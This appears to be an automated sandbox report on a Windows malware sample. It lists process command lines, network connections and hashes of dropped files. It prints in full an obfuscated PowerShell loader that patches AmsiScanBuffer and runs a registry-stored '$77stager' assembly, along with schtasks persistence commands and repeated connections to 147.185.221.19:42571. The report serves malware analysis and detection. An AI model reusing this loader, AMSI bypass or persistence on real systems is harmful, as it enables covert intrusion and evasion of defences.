C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HYFdDFDTpyLF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kzdYLOBIQUGoND,[Parameter(Position=1)][Type]$RFcHZzaONv)$kBhbHTEolUP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+'c'+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$kBhbHTEolUP.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+'a'+'l'+'N'+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'bli'+'c'+'',[Reflection.CallingConventions]::Standard,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$kBhbHTEolUP.DefineMethod('I'+'n'+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+''+'e'+'w'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RFcHZzaONv,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $kBhbHTEolUP.CreateType();}$sweZnEGrkVLkX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType('Mi'+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+'d'+'s');$EpMjWwMHmylFWv=$sweZnEGrkVLkX.GetMethod('Get'+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+'d'+'r'+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BYqbBcnCXGWvuPcKYXw=HYFdDFDTpyLF @([String])([IntPtr]);$KrlzDjBxAwVYdEORYoHyUX=HYFdDFDTpyLF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$beFIbIsMbYj=$sweZnEGrkVLkX.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+'l')));$TQsUUPEUmAKZKo=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+'L'+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$jljYdLiNhUbrXalZm=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object]('Vi'+[Char](114)+'tu'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$gWZHett=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TQsUUPEUmAKZKo,$BYqbBcnCXGWvuPcKYXw).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jKUEWHcKZfelKnHjH=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$gWZHett,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$tbryIxHVtp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,4,[ref]$tbryIxHVtp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jKUEWHcKZfelKnHjH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,0x20,[ref]$tbryIxHVtp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+'WA'+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'st'+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1560c5bc-66e8-4bee-b24c-ba981a93522f}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmpA9FB.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get UUID
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get UUID UUID
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 879d428bfc393a7980661c64eb6fdfe8 XlE41ATQV0aVT9QlSRxzIw.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 8.8.8.8:53 | politics-fiber.gl.at.ply.gg | udp |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 147.185.221.19:42571 | tcp |
Files
memory/2932-0-0x0000000074D2E000-0x0000000074D2F000-memory.dmp
memory/2932-1-0x0000000000620000-0x00000000018C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
| MD5 | 77a71f3a441aa3bf824967e52413bec5 |
| SHA1 | c3d6df5cfc5eefaadf9bcb3703484e3cadf79588 |
| SHA256 | 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82 |
| SHA512 | 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b |
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
| MD5 | f10712f4faa374be8f37668c5ebed4a6 |
| SHA1 | bb30e941c4f91ae3178539e993abecbfd838fdb0 |
| SHA256 | d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf |
| SHA512 | cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac |
memory/3984-65-0x00007FFB974D3000-0x00007FFB974D5000-memory.dmp
memory/3984-113-0x0000000000340000-0x0000000000352000-memory.dmp
memory/4576-127-0x0000000000A30000-0x0000000000A46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
| MD5 | 18f497deffe88b6b2cff336a277aface |
| SHA1 | 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e |
| SHA256 | 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5 |
| SHA512 | 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d |
C:\Users\Admin\AppData\Local\Temp\$77-install.exe
| MD5 | 1a7d1b5d24ba30c4d3d5502295ab5e89 |
| SHA1 | 2d5e69cf335605ba0a61f0bbecbea6fc06a42563 |
| SHA256 | b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5 |
| SHA512 | 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa |
memory/4280-208-0x00000000007C0000-0x0000000000806000-memory.dmp
memory/4280-219-0x00000000010B0000-0x00000000010B6000-memory.dmp
memory/2840-225-0x000001A81BB30000-0x000001A81BB52000-memory.dmp
C:\Windows\Temp\__PSScriptPolicyTest_04qlnryp.xkw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2840-231-0x000001A8344F0000-0x000001A83451A000-memory.dmp
memory/2840-232-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmp
memory/2840-233-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmp
memory/436-235-0x0000000140000000-0x0000000140008000-memory.dmp
memory/436-241-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmp
memory/436-240-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmp
memory/436-239-0x0000000140000000-0x0000000140008000-memory.dmp
memory/436-237-0x0000000140000000-0x0000000140008000-memory.dmp
memory/436-236-0x0000000140000000-0x0000000140008000-memory.dmp
memory/436-234-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.bat
| MD5 | 64066edfd8c8c9d8c6b0f9ad4d7e7b7b |
| SHA1 | c0e0caf9de83e7044baa3067e8ed0d6045fa91af |
| SHA256 | 97bef182a4f189659dc3f29b390d2982929a53363d52ed0ae538e5557ebe4275 |
| SHA512 | 4539c27e7d19d92c6ae78eaed456b8884363a7b5b02e6555755785ccdd826fbd47712c04b1f176103eb6a4d2a89a0bccb0ebadd2005a116ea355eb51b5c098dd |
memory/436-247-0x0000000140000000-0x0000000140008000-memory.dmp
memory/668-264-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmp
memory/952-274-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmp
memory/952-281-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
memory/732-296-0x00000127AE4F0000-0x00000127AE51B000-memory.dmp
memory/380-292-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
memory/380-291-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmp
memory/380-285-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmp
memory/952-280-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmp
memory/668-270-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
memory/668-269-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmp
memory/612-259-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
memory/612-258-0x00000139711B0000-0x00000139711DB000-memory.dmp
memory/612-252-0x00000139711B0000-0x00000139711DB000-memory.dmp
memory/612-251-0x00000139711B0000-0x00000139711DB000-memory.dmp
memory/612-250-0x0000013971180000-0x00000139711A5000-memory.dmp
C:\Windows\TEMP\tmpA9FB.tmp.bat
| MD5 | 82cff771f5910f91493b9b5c0f51964a |
| SHA1 | acda34e036c3296d4eb456b84d5fc14dedfe750f |
| SHA256 | 6293b9d57282dbb904f2a942282302a7c8290f70a006430abd6d5ad26f81aba7 |
| SHA512 | ed5445c39f53ee604ee2c8d8ee83a3787abf6f3e797f7ffefde85b9d7642f7bc072ad34e6a30c69df41b9e4a75ec9fa14aed7897ca9510f7d60797b25e4e202f |
memory/2932-1104-0x0000000074D2E000-0x0000000074D2F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |